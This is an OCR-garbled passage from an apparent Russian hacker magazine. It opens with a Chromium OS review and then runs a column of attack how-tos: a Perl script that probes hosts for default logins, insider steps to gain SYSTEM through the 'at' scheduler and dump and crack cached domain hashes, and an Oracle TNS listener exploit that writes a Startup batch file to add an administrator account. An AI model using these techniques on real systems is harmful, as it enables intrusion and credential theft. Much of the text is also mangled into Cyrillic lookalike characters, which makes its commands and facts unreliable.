часов в обычном режиме. В режиме ЗіапсІЬу, по словам производи- 
теля, новинка продержится неделю. От каких привычных элементов 
решил избавиться боодіе? Во-первых, от подверженных механиче- 
скому воздействию НОО-дисков — вместо них используется непри- 
хотливая НазЬ-память. Во-вторых, от клавиши Сарз І_оск — вместо 
нее теперь специальная кнопка для быстрого поиска. И в-третьих, 
от недостаточного охлаждения. Звучит неплохо, да? И вот, когда 
в процессе чтения характеристик уже начинают течь слюнки и 
хочется сказать: «Да-да! Я именно такой активный пользователь 
Инета, который точно будет использовать Сг-48 каждый день и 
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Делаем загрузочную 115В с СЬготіит 05 



выдавать подробнейший фидбек», на глаза попадается 
дополнительное уточнение, что пилотная программа 
распространяется только на жителей США. Так что 
попробовать новый гаджет можно разве что купив его у 
барыг на еВау. С другой стороны, пощупать операцион- 
ную систему, причем практически в том виде, в котором 
она установлена на борту С г-48, можно и на обычном 
компьютере или ноутбуке. 




Прежде чем начинать эксперименты, давай разбе- 
ремся, что вообще такое боодіе СЬготе 05. Если в 
двух словах, это ОС-браузер. Идея в том, что кроме 
браузера, который запускается через несколько секунд 
после включения устройства, тебе ничего больше и 
не нужно. Да-да, так и есть. Хочешь офисный пакет? 
Пожалуйста! боодіе Босз. Почтовый клиент? Соодіе 
МаШ ІМ-клиент? Соодіе Таік! И так далее... В ОС есть 
только браузер, а в качестве приложений устанавлива- 
ются веб-аппликации. Теперь это особенно просто бла- 
годаря появлению специального магазина приложений 
СЬготе ѴѴеЬ 51:оге (о нем ниже]. Компания Соодіе не 
раз заявляла, что ни одного действительно значимого 
десктопного приложения со времен Зкуре’а, который 
появился в 2003 году, разработано не было, и любая 
программа может отлично чувствовать себя в вебе. 
Сказано — сделано. Сначала были выпущены револю- 
ционные по своей функциональности онлайн-сервисы. 
Затем появился браузер боодіе СЬготе, в котором эти 
приложения чувствовали себя максимально комфортно, 
причем как в плане производительности, так и в плане 
поддержки всех современных стандартов (в том числе 
НТМЕ5 и ЕІазЬ]. И вот теперь — целая операционная 
система, в которой основной упор сделан на работу 
браузера. Все оптимизации направлены на то, чтобы 
пользователь уже через считанные секунды после 
включения мог получить доступ к СЬготе и запустить 
нужные ему приложения. Есть ли в этом смысл? 

На деле такой подход дает ряд неоспоримых плюсов. 
Данные хранятся на сервере — они не потеряются и в 
любой момент доступны с любого другого компьютера. 
Из всех приложений в системе фактически работает 
один лишь браузер, и это хорошо в плане безопасности 
— обновить одну программу, установив все заплатки 



(к тому же, это делается автоматически) проще, чем 
апдейтить систему и многочисленные программные 
продукты. Важен аспект быстродействия — прило- 
жения, пускай и в окружении браузера, выполняются 
очень быстро: в этом заслуга многочисленных оптими- 
заций, специального 35-движка Ѵ8, а также аппаратно- 
ускоренной 30-графики. В конце концов, это банально 
простота. Пользователю не надо морочить голову по 
поводу установки основных приложений — в СЬготе 
05 все сделано за него. Из этих плюсов, впрочем, 
вытекает один, но очень серьезный минус. Я говорю о 
тотальной привязанности к Сети. Лишь некоторые веб- 
приложения могут работать офлайн (тут опять же спа- 
сибо заранее разработанной технологии Соодіе Сеагз]. 
Остальным же интернет строго необходим. 




Вообще говоря, познакомиться с Соодіе СЬготе 05 уже 
давно может каждый. Дело в том, что большая часть исхо- 
дных кодов находится в совершенно открытом доступе. В 
рамках этого проекта система носит название СЬготіит 
05. Возникает вопрос: чем тогда эти две ОС отличаются 
друг от друга? Фундаментально это один и тот же код, но 
отличия все же есть. СЬготе 05 автоматически устанавли- 
вает апдейты, в то время как в СЬготіит 05 такой функ- 
ции пока не реализовано. Первая будет поддерживаться 
Соодіе, а поддержка второй ложится на плечи ореп-зоигсе 
сообщества. СЬготіит 05 является проектом с открытым 
кодом и в основном рассчитан на разработчиков, которые 
могут изменять имеющийся код и создавать свои соб- 
ственные версии. СЬготе 05 же предназначен для обыч- 
ных пользователей и будет устанавливаться на ноутбуки 
ОЕМ-производителями. Причем это единственный вариант 
получить эту ОС: она не будет продаваться в коробках и не 
будет доступна для загрузки в виде дистрибутива. Причина 
проста: СЬготе и правильный сточки зрения Соодіе ноут- 
бук— понятия неделимые. 

Но мы можем совершенно спокойно взять исходники с 
сЬготіит.огд/сЬготіит-оз . открыть подробную инструк- 
цию и собрать свою собственную СЬготе 05. С другой 
стороны, можно даже не возиться с таке и Ьиіісі. Есть 
более простой вариант — найти уже собранную версию 
СЬготіит 05. Таких готовых сборок довольно много, но 
наиболее популярными являются версии от парня с ником 
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Популярный ресурс 
по СЬготе 05: ѵѵѵѵѵѵ. 
сЬготеоззіІе.сот : 
Русскоязычный ре- 
сурс по ОС от Соодіе: 
ѵѵѵѵѵѵ. оз Ьудоодіе.ги . 
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Рабочие сборки 
СЬготе 05ты най- 
дешьнанашем диске 
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Несмотря на большую 
активность боодіе 
по продвижению 
СЬготе 05, бывший 
сотрудник компании, 
Пол Бакхайт, сделал 
заявление, что про- 
ектоперационной 
системы СЬготе 05 
не имеет будущего. 

По его мнению, в 
СЬготе 05 изначаль- 
но не было никакого 
смысла, поскольку 
большая часть воз- 
можностей этой плат- 
формы реализована 
в АпбгоісІ. Поэтому 
уже в следующем году 
проект СЬготе 05 
либо будет свернут, 
либо объединен с 
АпбгоісІ. 
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ѴМѵѵаге РІауег — бесплатная программа для запуска 
виртуальных машин 

НеххеЬ [ сбготеоз.ЬеххеЬ.пеі: ]. Последняя сборка имеет кодовое назва- 
ние Ріоѵѵ и помимо оригинального кода несет в себе ряд полезных 
доработок. 

В дополнение к оригинальной версии ты получаешь лучшую под- 
держку железа и веб-камеры, автоматические обновления, а также 
улучшенный интерфейс. Все файлы отлично умещаются на 2Гб изб- 
флешке. 

Два варианта загрузки 

На своем сайте НеххеЬ предлагает два разных образа СЬготіит 05: 
ѴМѴѴаге-ітаде для запуска системы под ѴМѵѵаге и изб-ітаде, чтобы 



Обычные линуксовые программы 
в СНготіит 05 



Несмотря на загоны Ооодіе’а по поводу того, что приложения 
должны быть выполнены в виде веб-сервиса, СЬготіит 05 
базируется на ядре ІІЬипІи. А это значит, что при желании можно 
установить все привычные линуксовые программы. Для этого 
делаем следующее: 

1. Открываем окно терминала уже знакомой горячей клавишей 

< сігі+аіі+т > 

2 . Далее создаем вспомогательные каталоги: 

$ зисіо тксііг -р /ѵаг/саске/арЦ/агсМѵез/рагкіаІ 
$ зисіо тксііг -р /ѵаг/Іод/арС 

3. Перемонтируем корень в гѵѵ: 

$ зисіо шоипС -о гешоипС , гм / 

4 . Создаем файл с описанием репозиториев зоигсез.іізі: 

$ есію " сіеЪ НШСр : / /шіггог .уапсіех . ги/иЬипСи кагшіс 
шаіп гезкгіскесі" I зисіо Дее -а /еДс/арД /зоигсез . 
ІізД 

5 . Получаем список пакетов: 

$ зисіо арД-деД ирсіаДе 

6 . Устанавливаем все необходимое. 




Окно авторизации в СНготіит Ріоѵѵ 



закинуть все данные на флешку и загружаться с нее. Оба занимают 
примерно по 300 Мб. 

Чтобы запустить образ виртуальной машины, необязательно искать 
полную версию ѴМѵѵаге — с запуском вполне справится бесплатная 
прога ѴМѵѵаге РІауег [ ѵтѵѵаге.сопп/ргосіисіз/ріаѵег ]. После распаковки 
архива у тебя будет два файла: конфиг виртуалки (СЬготе05.ѵтх) 
и ее виртуальный Н00 (СЬготе05.ѵтсІк]. После запуска ѴМѵѵаге 
Ріауег’а необходимо выбрать в меню пункт «Ореп а Ѵі гіиа I МасЫпе» и 
указать пункт до ѵтх-файла. Через некоторое время ты увидишь окно 
загруженной СЬготіит 05. Видишь, как все просто. У запуска под 
виртуалкой есть одно большое преимущество: система точно зара- 
ботает. Нет никакой зависимости оттого, на каком железе работает 
компьютер и ноутбук. С другой стороны, по меньшей мере нелепо 
пробовать в действии ОС, которая позиционируется как сверхбы- 
страя, под тормозным виртуальным окружением. Поэтому я все же 
рекомендую загрузить ОС от Ооодіе с флешки. 

Образ с файлами для загрузки с изб-накопителя распространяется 
на сайте Неххеб’а в формате 1М0 и упакован в Іад.дг. Распаковав 
образ с помощью ѴѴіпВАВ или 7-гір, необходимо записать его на 
флешку (>= 2 Гб]. Далее — перенести на флешку файлы из образа. В 
этом поможет утилита Ітаде ѴѴгкег \оѵ ѴѴіпсІоѵѵз [ ІаипсбрасІ.пеІ:/ѵѵіп32- 
іаде-уѵгіДег ]. которой нужно будет указать путь до ІМО-файла и имя 
флешки, на которую будет выполняться запись. Не пугайся, если 
во время запуска проги выскочит ошибка «Рііе еггог», ругаясь на 
невозможность получить дескриптор девайса. Это нормально. Файлы 
все равно будут перемещены из ІМО-файла на флешку. Через неко- 
торое время можно будет ребутать компьютер и, не забыв включить 
загрузку с изб-накопителя в БИОСе, пощупать реально работающую 
систему. 

Первый запуск 

Загрузившись, ОС попросит ввести логин/пароль. В случае СЬготе 
ОС здесь нужно было бы ввести данные от своего Ооодіе-аккаунта. 
Но, так как мы имеем дело со сборкой Ріоѵѵ, то дефолтные логин и 
пароль — ІасерипсЬДасерипсЬ. После входа в систему сразу загружа- 
ется браузер :]. 

В левом углу на уровне вкладок будет логотип СЬготе — это страни- 
ца с ярлыками приложений (надо понимать, что в большинстве своем 
это просто закладки, которые открывают страницы соответствующих 
веб-сервисов]. В правом верхнем углу будет иконка для настройки 
браузера, пиктограмма для отображения текущего заряда батареи и 
простенький менеджер настройки сети. Собственно, это все, больше 
ничего нет — даже для того, чтобы сделать скриншот, надо устанав- 
ливать расширение для браузера. 
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Магазин веб-приложений СЬготе 
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В новом менеджере окон есть хоткеи на все случаи жизни. Достаточно 
нажать <Р8>, чтобы увидеть интерактивную справку по хоткеям (под- 
робнее во врезке). Если хочется поковыряться в системе поглубже, 
нажми <СіхІ.+Аи+{> и откроется окно родного терминала. К сожалению, 
поддержка железа у СЬготіит 05 пока хромает. На сайте естьѵѵікі, в 
котором составляется список проверенных ноутбуков и нетбуков, на 
которых ОС гарантированно заработает. К примеру, на двух из трех 
тестовых ноутбуков не захотела работать беспроводная сеть. 

Так же, как в обычных дистрибутивах Ыпих есть менеджеры пакетов, 
для СЬготе 05 есть магазин приложений СЬготе ѴѴеЬ 5іоге [ сЬготе. 



Список горячих клавиш в СЬготе 05 



Выпустив нетбук Сг-48, Ооодіе показал и то, как он видит 
оптимальную раскладку, которая отличается от стандартной. Так, 
в компании безжалостно избавились от кнопки Сарз Боек. Вместо 
нее теперь горячая клавиша для поиска. Если говорить о других 
горячих клавишах, то в СЬготе 05 их предостаточно. Посмотреть 
все комбинации хоткеев можно прямо в 
системе, нажав <Е8>. Ниже — список самых востребованных: 

<8ЫПС>-<Езс> — запуск таск-менеджера 
<ССг1>-<Васк> — предыдущая вкладка 
<ССг1>-<Рогѵ^агсі> — следующая вкладка 
<ССг1>-<ЫехС> — сделать скриншот окна 
<ССг1>-<АІС>-<Ц> — открыть окно терминала 
<ССг1>-<81ііПД>-<і> — отобразить тулзы для девелопера 



аооаІе.сот/ѵѵеЬвІоге ). Функционально такой каталог аналогичен 
Арріе Арр 5іоге, Апбгоіб Матке! и другим магазинам приложений для 
мобильных устройств: каждая программа имеет описание, рецензии 
пользователей и общий рейтинг. 

Большинство приложений бесплатны и устанавливаются в один 
клик мыши. Есть и платные — в этом случае деньги при покупке 
списываются со счета, который необходимо привязать к свое- 
му аккаунту. Несмотря на то, что магазин приложений Ооодіе 
появился совсем недавно, уже сейчас здесь есть масса полез- 
ностей. 

Что будет дальше? 

Компания Оооде движется по намеченному пути. Сначала у нее поя- 
вились «программы в браузере», доказавшие свою состоятельность 
и мало в чем уступающие десктопным приложениям. Позже корпо- 
рация после многих лет поддержки МогіІАа неожиданно выпускает 
сверхбыстрый браузер, чтобы еще улучшить эти приложения (чего 
стоит опция, позволяющая сделать из любой странички обычную про- 
грамму). И вот теперь — релиз ОС, которая максимально заточена под 
работу браузера. 

Даже если из этой затеи ничего не получится (а такие слухи ходят), 
Соодіе’у это нужно хотя бы для того, чтобы закончить логическую 
цепочку. У нас же сейчас есть два варианта. Мы можем дождаться в 
продаже нетбуков на базе СЬготе 05, о выпуске которых уже заявили 
некоторые производители, или прямо сейчас взять образ СЬготіит 
05 и посмотреть, что это за зверь. В конце концов, можно поставить 
последнюю бету Ооодіе СЬготе, в которой всем желающим открыт 
доступ к приложениям из СЬготе ѴѴеЬ 5іоге! т 
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ЗАДАЧА: ПРОВЕРИТЬ ГРУППУ 
ІІРІ. НА ДОСТУП 



РЕШЕНИЕ: 

Да здравствуетавтоматизация! В нашем деле без нее — никак. Напри- 
мер, часто требуется проверить какую-то группу хостов на существо- 
вание некого игГа или на стандартные логины/пароли. Чтобы автома- 
тизировать данный процесс, можно воспользоваться каким-нибудь 
скриптовым языком. Я вот Регі люблю, особенно его гедехр’ы :). 

Потому за основу решения данной задачи возьмем Регіс библиотекой 
І_ѴѴР, которая по стандарту присутствует в его комплектациях. 

# ! /изг/Ьіп/регІ 
#Подключаем библиотечку 
изе ШР: :ІІзегАдепб; 

#Первый аргумент — файл с ыгі ' ами для проверки 
$ір_Пі1е=$АЕСѴ [ 0 ] ; 

#Открываем файл и читаем его 

ореп (ЕІЬЕ , " $ір_^і1е" ) ог біе " $ір_Пі1е поб ІоипсГ' ; 
вдМІе (<ЕІЬЕ>) { 

#Убираем перевод строки и добавляем хост в массив 
сЬошр ( $_) ; 
ризЬ(@ірз, $_) ; 

} 

сіозе (РІЬЕ) ; 

#Создаем новый объект 
$Ъготлзег = пем ШР: :ІІзегАдепЬ; 

#Ждем ответ 5 секунд 
$Ъгоѵ\гзег->ЬітеоиЬ (5) ; 



#Проходим по всем хостам 
ІогеасЪ. $ір(@ірз) { 

#Отправляем запрос на хост 
$гезропзе= $Ьгоѵ/зег->деЬ ( $ір) ; 

#Проверяем ответ 

іі ( ! $гезропзе->із_зиссезз ) { 

ргіпб " Еггог : " . $гезропзе->зЬабиз_1іпе . " \г\п" ; 

} 

еізе {ргіпб "ОК: " . $гезропзе->зЬабиз_1іпе . " \г\п " ; } 

} 

Как видишь — все просто. Запрос к серверу выполняется одной коман- 
дой. 

В $гезропзе->зЬабиз_1іпе хранится код ответа, по которому можно 
судить о ситуации. Итог странички в $гезропзе->сопЬепЬ. 

Чтобы пройти ЫЧр-аутентификацию, требуется добавить пару строк 
перед отправкой запроса: 

$Ьгоѵ^зег->сгебепЬіа1з ( 

$ір[$і] . 1 : 80 ' , 

1 Вазіс геаіт * , 

'изегпате' => 'раззчлгогсН 
) ; 

Тут все понятно: имя хоста с портом, строка запроса (то, что в кавычках, 
если зайти на игі браузером], логин и пароль. 

Данный модуль можетмногое: СЕТ/Р05Т запросы, кукисы, изменение 
ЬИр -за головков и так далее. Быстро и просто. 

Я думаю, ни для кого не секрет, что скриптовых языков много — чего 
стоятхотя бы такие гиганты, как РНР, Руібоп, Регі, ПиЬу... Каждый из них 
имеет свои бонусы, хотя применительно к нашим целям разница не осо- 
бозаметна. Главное — иметь в запасе знаний хотя бы один скриптовый 
язык, и его применение, несомненно, принесетхорошие плоды. 




ЗАДАЧА: ОБНОВИТЬ МЕТА5РЮІТ 
РВАМЕѴѴОВК ЧЕРЕЗ ПРОКСИ-СЕРВЕР 



РЕШЕНИЕ: 

Меіазріоіі Ргатеѵѵогк растет и развивается каждый день: новые 
модули, скрипты и возможности, исправление всевозможных 
багов... Работа над М5Р кипит. Потому и обновлять его желательно 
каждый день. Система обновления М5Р построена на основе ЗѴЫ 
(ЗиЬѵегзіоп]. ЗиЬѵегзіоп — это свободная централизованная система 
управления версиями, которая используется очень многими раз- 
работчиками программного обеспечения (и нетолько] в различных 
проектах. Доступ в ЗѴЫ осуществляется различными способами, в 
том числе и по Ыір/Ьирз-протоколу. При обновлении МеІазрІоіРа 
используется как раз Ыірз-протокол. И логично, что в такой ситуации 
система просто обязана поддерживать работу через прокси-серверы. 



I 1 АТ *■■■ ! ■. ■ і ЦЧи.|і..іРЧ.-.іЬН№ 

ГѴ№1 Пнкк Койдавга Омі 5*п*ск ИьИ"» 

и • :гЗ і ■ > Мь і * ч , С ' т ’іі 5 * - | чі ^4 ■■ 




Н ыглгв |Н | ЁІ | ЁІ | В 



99 


к МЯ.Р - 41 вп і'"!лТі ; 


і .-.1 і .ім 




«роіісогу. ЫягцдігуУі'ЭпаотрЬ.ссіт 


* Ііиг^дгочз = * 


івхлгпріа тот 


1 е гг гг и 1 ІІ ІІ Г РЗІ П 1 . Г 


іч г іМг іи >1 уи іі.д і 


! • ■ [ММ ] 


НЦр ргокѵ ИоЕк 


192 1^0 Ц 


Ііщэ-рголу-речт 


- б'С?ЙО 



Настройка использования прокси ЗиЬѵегзіоп 



Ну это так, в качестве обще го описания, в основном для ѴѴіп-пользо- 
вателей, так какЗѴЫ запихнут в большиство *піх-систем :). 
Ноначнемс последних. Файлы конфигов ЗѴЫ лежат в домашней 
директории каждого пользователя в .зибѵегзіоп. Для настройки 
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прокси нам потребуется файл зегѵег.В нем, в разделе [діобаі], мы 
можем задать общие настройки по прокси: имя сервера, порт, логин 
и пароль (если на прокси используется аутентификация пользовате- 
лей], данные аутентификации для доступа к репозиторию, настройки 
55І_ и так далее. 

Так как 5ѴІ\І -система используется для доступа к различным ре- 
позиториям, то и настройки можно задавать для каждого из них. 
Например, зададим настройки для доступа к МЗЕ. Находим [дгоирз] и 
создаем группу: 

МБР = * . теСазрІоіС . сот 

Далее пропишем для нее настройки прокси: 

[МБР] 

ЬССр-ргоху-ЪозС = адрес_прокси 
ТШСр-ргоху-рогС = порт_прокси 



Все, как видишь, очень просто. 

Теперь немного специфики для МЗЕ в ѴѴіпбоѵѵз-системах. 

До последней версии Меіазріоіі: работал в Судѵѵіп’е и настра- 
ивался ЗѴЫ уже в нем, то есть аналогично *піх-версиям. С 
выходом же версии 3.5 ситуация изменилась, так как от Судѵѵіп’а 
отказались. 

Теперь в ѴѴіп-инсталляшке помимо МЗЕ устанавливается куча вся- 
кого дополнительного ПО типа РозідеЗОБ и ЗАѴА (потому и размер 
дистрибутива вырос до 250 метров). В том числе устанавливается 
ЗиЬѵегзіоп. 

Лежит он физически в «путь_до_МЗР\і:ооІ5\5ѵп». Кстати, погова- 
ривают о проблемах, если ЗиЬѵегзіоп уже был установлен. Так что 
будьтам осторожнее :]. 

Файл настройки ЗѴЫ запрятали совсем глубоко — в скрытую папку 
«Арріісабоп Ваіа» каждого из пользователей. Попастьтуда можно 
так: %АРР0АТА%\5иЬѵегзіоп. 

Остальное — аналогично *піх-системам. 




ЗАДАЧА: ПОЛУЧИТЬ НАЗВАНИЕ ПРОИЗ- 
ВОДИТЕЛЯ УСТРОЙСТВА ПО ЕГО АААС-АД- 
РЕСУ. 



РЕШЕНИЕ: 

Ни для кого не секрет, что почти у всех сетевых устройств имеются 
48-битные МАС-адреса, и что адреса эти уникальны. Первые 24 (точнее, 
22] бита адреса привязаны кего производителю. Потому появляется 
возможность выявлять однотипные устройства в локальной Сети, а в 
случае крупных Сетей это бывает очень полезно. Большинство Х-тулз 
типа Ытар’а имеютсвои базы (файл птар-тас-ргебхез], по которым 
выявляют вендора. Но не все так часто обновляются, как N тар, и, на- 
при мер, тот же Саіп&АЬеІ (файл оиі.М) имеет проблемы с определением 
производителя по новым устройствам. Последнюю официальную базу 
0111 (Огдапігабопаііу ІІпідие ИепЬЬег] можно почерпнуть тут: зіапсіагсіз. 
іеее.огд/беѵеІор/гедаиіФ/оиі/оиі.М . 




Крометого, есть нестандартные зна- 
чения 01Л, которых нетв данной базе. 

В основном это всякие виртуальные 
устройства. Некоторые из таких 0111 есть 
в базе ІМтар’а, в остальных случаях 
потребуется воспользоваться силами 
поисковиков. 



ОгдапігаІіопаІІу ІІпідие 
ІсІепі№ег$ 




ЗАДАЧА: ПОЛУЧЕНИЕ ПРАВ ДОМЕННО- 
ГО АДМИНА 



РЕШЕНИЕ: 

Продолжим серию решений для этой насущной задачи :) 

В данном случае предположим, что у нас есть физический доступ к 
одному из компьютеров (мы — злобные инсайдеры), на который за- 
ходил, хотя бы удаленно, один из доменных админов. Добиться того, 
чтобы админ зашел на него — не проблема. По стандарту, у обычных 
пользователей нет прав на установку ПО или изменение каких-ли- 
бо настроек — это делают админы. По логике, админы должны бы 
ходить для таких дел по компьютерам под урезанными учетными 
записями, но такое бывает редко — обычно они ползают с доменны- 
ми правами. 

Если такими мелкими вопросами занимается техподдержка и ад- 
минчика не удается заставить зайти на подконтрольный комп, то это 
тоже не страшно. Завладев правами техподдержки, можно уже будет 
развить атаку на других системах. 

Общая задача такова: запустить какую- ни будь тулзу типа 
дзессіитр’а или Ідбитр’а, которая выдаст нам либо хэш ики, либо кэ- 
ши ки пароля админчика :). Имея хэш ики, можно будет сразу ползти 
на домен, используя технику «разе ІЬ е баз Ь», о которой я писал в 
предыдущем номере. Кэшики придется брутить. Нодавай последо- 
вательно. Данные тулзы для своей работы требуют как минимум прав 
Администратора, но по факту — І_оса15уз1:епп. Как стать локальным 



админом — вопрос, конечно, большой. Но если его получить хотя 
бы в виде І\ІТІ_М-хэша, то, считай, дело сделано. Хотя бы потому, 
что очень часто пасс на локального админа ставят одинаковым для 
большинства хостов. 

Номы воспользуемся несколько другим способом. Используя либо за- 
грузочный диск, либо загрузочную флешку и поставив загрузку с данного 
девайса, можно сбросить парольлокального админа. Дистрибутивов, 
которые мо гут делать та кие вещи, достаточно. Если на ВІ05 стоит пароль, 
то можно его сбросить, вынув батарейку. Классика, в общем. 

Еще важный момент. Локальный администратор — это стандартная 
учетная запись, но при использовании доменов ее частенько отклю- 
чают для секьюрности. Фишка втом, что если перезагрузить комп и 
запустить ѴѴіп б оѵѵз в безопасном режиме (кликай Е8 при загрузке ОС], 
то локальная учетная запись админа включается. Так что очень вероят- 
но подойдет и пустой пароль :). Зайдя под локальным админом, можно 
включить учетку и в нормальном виде («Мой ПК Управление компью- 
тером -> Пользователи Администратор -> Свойства Отключить 
учетную запись»]. Далее, залогинившись под администратором, можно 
поднять свои права до Зузіепп. Носначала о специфике данныхтулз, и 
вообще о системе хранения авторизационных данных в ѴѴіпсІоѵѵз. 

Данные эти хранятся втрех местах: в ЗАМ, в І_5Аи в кэше. Если не вда- 
ваться В Подробности, ТО: 

• в ЗАМ хранятся І_М/І\ІТІ_М-хэши локальных пользователей да иного хоста; 

• в І_5А также хранятся І_М/І\ІТІ_М-хэши, ноуже пользователей доменных; 

• в кэше хранятся хэши паролей десяти последних пользователей, кото- 
рые авторизовались на данном хосте. 
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ЫТШ-хэши, экспортированные в Саіп 




Хэш и из ЗАМ, понятно, нам не очень интересны. Кстати, ЬазЬсІитр в 
М5Р достаеттолько их, к сожалению. 

І_5А — лакомый кусочек, ноданныевнем стираются после перезаг- 
рузки. 

Кэш — неплохое место. Официально он используется в тех ситуациях, 
когда доменный хост не имеетсвязи с доменом, а пользователю все- 
таки надо поработать. Потому авторизация происходите использова- 
нием данных из кэша. 

Для нас проблема с кэшем заключается в том, что это не простой 
І\ІТІ_М-хэш ЮЕБ]. 

Кэш получается следующим образом: 

1. Пароль хэшируется БТЬМ- алгоритмом (то есть БЕЗ) ; 

2 . Логин конвертируется в Бпісобе; 

3. Логин добавляется к хэшу пароля, и еще раз хэширует- 
ся по МБ4 . 



Так какхэш «просаливается» логином, то тут нам поможеттолько 
перебор. Подробнее можно почитать тут: орепѵѵа II. і пі'о/ѵѵі кі/іоЬ п/ 
МЗСазб . 

Теперь отулзах: ^дбитр — может доставать кэши, а дзессіитр — 
доменные учетные записи из хранилищ. Обе бе рут также данные из 
ЗАМ. 

Чтобы получить права Зузіеіті, можно воспользоваться стандартным 
виндовым планировщиком заданий. Под ѴѴіпбоѵѵз ХР точно работает 

Пишем в консоли: 

аб 19:45 / ШТЕКАСТІѴЕ стб /с " с : Хдзесбшпр . ехе -а > с:\ 
ЬазН.бхб " 

Где: 

• аб — команда для манипуляции с заданиями; 

•19:45 — время запуска команды; 
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• /штекастіѵе — необязательная опция, которая указывает, что 
пользователь может взаимодействовать с запускаемой программой; 
•стй/с "с : Хдвесйшпр . ехе -а > с: ЛИазЬ. ДхЬ "—запускаем 
консоль, в которой запустится дзессіитр, на дамп из всех мест, сохра- 
няя результат в файл ЬазЬ.М. 

Для работоспособности данного способа требуется, чтобы была запу- 
щена служба «Планировщик заданий» (Зсбесіиіе зегѵісе]. 

Чтобы не ждать долго, ставим время запуска через пару минут 
оттекущего времени, и в назначенный момент данная команда 
выполнится с необходимыми правами, а мы получим хэшики/ 
кэшики. 

Что делать с хэш и ка ми — ясно, кэшики же, как было сказано ранее, 
придется брутфорсить. 

Сделать это можно, например, используя ЧоЬпТЬе Ріррег ( орепѵѵаіі. 
сот/щЬп ] сщтЬо патчем ( орепѵѵаіі. сот/] об п/сопІгіЬ/щЬп-І .7.6- 
ІитЬо-9-уѵіп32.2Ір ]. либо используя Саіп&АЬеІ І охісІ.іі/саіп.ЫппІ ]. 

ЗоЪп.ехе --:Еогтак=тзсазЪ. --ѵтогс!1ізк=раззѵѵогс1_2 . Ізк 
Ідсіитр . Рхк 

Где 

• --1огтак=тзсазк — указываем, что ломаем виндовый кэш ; 

• --члгог(І1ізЦ=раззтлгог(}_2 . ізк — ворд-лист (но можно и перебором); 

• Ідйитр.кхк — откуда брать кэшики. 



Джон понимает стандарный вывод Ідбитр’а. 

С Саіп’ом несколько сложнее. Во-первых, потому, что в Саіп можно 
импортировать кэшики либо с локальной машины, либо из краденых 
разделов реестра (зесигііу и зузіепп]. Во-вторых, у Саіп’а другой фор- 
мат вводимых данных, не та кой, каку Ідбитр’а. Но это все решабель- 
но. Как — читай далее. 

Итак, открываем папку с Саіп’ом и находимтам файл сасЬеЧзГ 
Он обычныйтекстовый. Открываем его и вставляем данные итогов Ідбитр’а. 
Разница в форматах заключается втом, чтоуідбиппр’а он имеетвид: 

имя_пользователя : кэш : имя_домена : полное_имя_домена 

Ау Саіп’а: 

имя_домена \Р имя_пользователя \Р пароль \к кэш \Р по- 
метки 

Где\1 — знак табуляции. 

Так как пароль неизвестен, то в соответствующем месте оставляем 
пустоту. Поле пометки тоже пустое. Главное — соблюсти символы 
табуляции. Еще одна проблема, классическая, кириллические имена 
пользователей. У бдсіитр’а с этим проблемы. Не совсем ясна ситуация 
сщбп’ом. У Саіп’а все тип -топ. 

Вот, в принципе, и все. 




ЗАДАЧА: ПОХАКАТЬ СЕРВЕР ОКАСХЕ 
ЧЕРЕЗ ТИЗ-иЗТЕМЕР. 



РЕШЕНИЕ: 

Есть один бородатый способ порутания операционной системы и/или 
повышения своих прав в Огасіе через ТЫЭ-ІізІепегэтой самой базы 
данных. Работаетон во всех версияхдо 10-й. 

ВообщеТЫЗ Іізіепег используется во всех Огасіе'ах для управления 
сетевым трафиком между базой данных и клиентами. Висит этот сервис 
обычно на 1 521 порту. 

Л истенер — это одна из основных возможностей залезть в систему. 
Во-первых, потому, что через него можно выполнять кое-какие команды 
типа зіаіиз, зегѵісез и ѵегзіоп, в ответе которых можно найти чрезвычай- 
но полезную информацию. Например, версию ОС и Огасіе, а также БЮ’ы 
базы данных. Во-вторых, есть несколько уязвимостей, связанных с его 
БоЭ’ом. Суть же описываемого способа заключается в эксплуатации уяз- 
вимости этого ТЫЭ-ІізІепег’а, которая позволяетуказывать любое место 
для записи логов за счет команды зеІ_Іод. 

Для реализации мы можем воспользоваться либо простеньким регі- 
скриптиком І іаітіітіесІ.соітѴ-іѵѵа/Ьаскз/зесигіІѵ/іпзсппсІ І. либо аналогич- 
ным модулем в МеІазрІоіГе І аихіІіагѵ\асІппіп\огасІеЧ:п5сппсІ ). 

Итак, выполняем следующие две команды: 



. /Рпзстсі.рі -Ъ 192.168.0.100 --гаѵѵстсі 
" (БЕ8СКІРТІОБ= ( СОШЕСТ_БАТА= (СІБ= (РКОСКАМ=) 

(НОЗТ=) (Б8ЕК=) ) (СОММАББ=1од_1і1е) ( АКСШЕБТЗ=4 ) 
(ЗЕКѴІСЕ=ЫЗТЕБЕК) (ѴЕКЗІСЖ=1) (ѴАШЕ=С : \Босшпепкз 
апсі Зеккіпдз\АІ1 Бзегз\ЗкагР Мепи\Ргодгатз\8кагкир\ 
ЫаЛЫаЬ.ЬаБ) ) ) " 



Где 

• -Ъ 192 . 168 . 0 . 10 0 — это наша цель с Огасіе'ом; 

• --гаѵѵстсі —указываем, что будет посылаться следующая строка, а не 
стандартная команда. 

Тут есть важный момент: это указание выполнить команду 1од_Пе 
(С0ММАМБ=1од_Пе) с необходимым нам значением (ѴАШЕ=С:\ 
Боситепіз апб 5еШпдз\АИ ІІзегзѴэІагІ Мепи\Ргодгатз\51:аг1ир\ 
ЫаЬЫаб.ЬаІ:]. 



В данном случае мы указали батник, который создастся в меню «Пуск 
Автозагрузка» у всех пользователей. И когда какой-то пользователь 
зайдет на сервер с Огасіе’ом, то исполнятся команды, которые мы туда 
запихнем следующим образом: 

. /Рпзстсі.рі -Ь. 192.168.0.100 --гаѵѵстсі 
" (БЕ8СЕІРТІОБ= ( СОШЕСТ_БАТА= ( ( 
пек изег изегпаше раззѵѵогсі /асМ 
пек Іосаідгоир Администраторы изегпаше /асісі 



Команды стандартные виндовые. Первая добавляет пользователя 
изегпате с паролем раззѵѵогсі в ОС, а вторая — добавляетэтого пользо- 
вателя в группу локальных администраторов. Простенько, но работает. 
Что хорошо — Огасіе чаще всего бывает запущен под системными учет- 
ными записями, то естьс большими правами, а потому позволяет писать 
логи куда угодно. 

Основная проблема данного способа заключается втом, что кроме 
наших команд в лог-файл попадает куча всякого мусора, который ограни- 
чиваетнаши возможности. С батниками все о’кей — мусор не восприни- 
мается в консоли, а необходимые для исполнения команды мы выделяем 
переносами строк. 

Можно воспользоваться еще одной классической идеей и создать ново- 
го пользователя в Огасіе с правами ОБА, а это бывает даже важнее самой 
ОС, когда цель — база данных. Для этого в качестве итогового файла 
логов укажем діодіп.зді. По стандарту в винде с девятой версией Огасіе 
